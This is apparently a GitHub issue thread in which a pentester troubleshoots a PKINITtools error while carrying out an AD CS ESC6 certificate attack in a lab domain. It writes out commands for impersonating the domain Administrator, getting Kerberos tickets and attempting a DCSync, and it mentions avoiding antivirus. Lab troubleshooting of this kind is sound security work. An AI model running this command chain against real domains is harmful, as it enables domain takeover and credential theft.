AttributeError: 'str' object has no attribute 'value'

[jsdhasfeds]

Hi,

Thank you for your effort developing this tool. I am trying to use the tool to request a TGT but it currently fails. See below for the command I used and the related error.

──(shadow)─(root💀kali)-[/home/kali/pentest/PKINITtools-master] └─# python3 gettgtpkinit.py adlab.local/user_t_1_admins user_t_1_admins.ccache -cert-pfx /home/kali/pentest/pywhisker-main/hHKEiIIf.pfx -pfx-pass OhEKkA1wkW7FC1xUX337 2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file 2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT Traceback (most recent call last): File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in main() File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main amain(args) File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain res = sock.sendrecv(req) File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv raise KerberosError(krb_message) File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in init super(Exception, self).init('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value)) AttributeError: 'str' object has no attribute 'value'

[jsdhasfeds]

Note that this works when requesting a TGT for the machine account of a DC.

┌──(virtual_env_pkinittools)─(root💀kali)-[~/pentest/PKINITtools-master] └─# python3 gettgtpkinit.py 'adlab.local/DC1$' -cert-pfx /root/pentest/cert.pfx out.ccache
2021-09-16 09:06:34,708 minikerberos INFO Loading certificate and key from file 2021-09-16 09:06:34,808 minikerberos INFO Requesting TGT 2021-09-16 09:06:34,826 minikerberos INFO AS-REP encryption key (you might need this later): 2021-09-16 09:06:34,826 minikerberos INFO 3bb37a1e77811cda4193c61fb2327dbf9763f853c9502d86ab74f632f5f6e32d 2021-09-16 09:06:34,832 minikerberos INFO Saved TGT to file

[jsdhasfeds]

Maybe the following will help. I am trying to exploit scenario ESC6 using Kali only.

To be clear, the CA "adlab-SERVER2-CA" has the flag "EDITF_ATTRIBUTESUBJECTALTNAME2" enabled and the service "certsvc" has been restarted.

This is what I do:

1) Request a TGT using known plaintext credentials of a low priv. account: python3 /usr/share/doc/python3-impacket/examples/getTGT.py 'adlab.local/domainuser1:Passw0rd!' 2) Update the Kerberos variable with the TGT from the previous step: export KRB5CCNAME=/root/pentest/domainuser1.ccache 3) Request a certificate impersonating the "Administrator" account: python3 certi.py req adlab.local/domainuser1@server2.adlab.local adlab-SERVER2-CA -k --no-pass --alt-name administrator --template User -o /root/pentest/administrator.pfx 4) Request a TGT for the account "administrator" using the file "administrator.pfx": python3 gettgtpkinit.py adlab.local/administrator /root/pentest/administrator2.ccache -cert-pfx /root/pentest/administrator.pfx -pfx-pass admin

Executing gettgtpkinit.py I get the below error:

2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file 2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT Traceback (most recent call last): File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in main() File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main amain(args) File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain res = sock.sendrecv(req) File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv raise KerberosError(krb_message) File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in init super(Exception, self).init('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value)) AttributeError: 'str' object has no attribute 'value'

Note that step 3 works but also outputs "Impersonation of Administrator@adlab.local not allowed with this certificate". This I do not understand since the only mentioned requirement for the scenario ESC6 is that the CA has the flag "EDITF_ATTRIBUTESUBJECTALTNAME2" enabled. If I use a custom template instead of the default template "User", which is supposed to work, and grant "domainuser1" enrollment access on that template, I no longer get the message "Impersonation of Administrator@adlab.local not allowed with this certificate". However, in the end this attack still fails on step 4.

Certi.py comes from https://github.com/eloypgz/certi

[jsdhasfeds]

If I instead execute "python3 gettgtpkinit.py adlab.local/domainuser1 /root/pentest/test/administrator.ccache -cert-pfx /root/pentest/test/administrator.pfx -pfx-pass admin" as step 4 the command works but when I after that attempt to DCSync using "secretdump" and TGT for domainuser1 (?) it fails with "[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.".

Also note that when performing the same attack from a domain-joined Windows machine using Certify, Rubeus and ticket_converter this all works. I can DCSync just fine. However, both Certify and Rubeus are detected by AV making this plan B.

[jsdhasfedssad]

This error occurs if somehow the domain group Domain Controllers does not have any rights on the CA certificate itself. Add the group, give it the required rights and restart the ADCS service.

[dirkjanm]

This error only showed up when there was an actual Kerberos error being thrown. So the error is outside of the tool, but it's related to the use of the certificate or issues with the PKI setup. Minikerberos was not handling those correctly, which should have been fixed with the latest release there. This won't magically fix the attack from working if something is wrong, but it should at least give you an error that can point in the right direction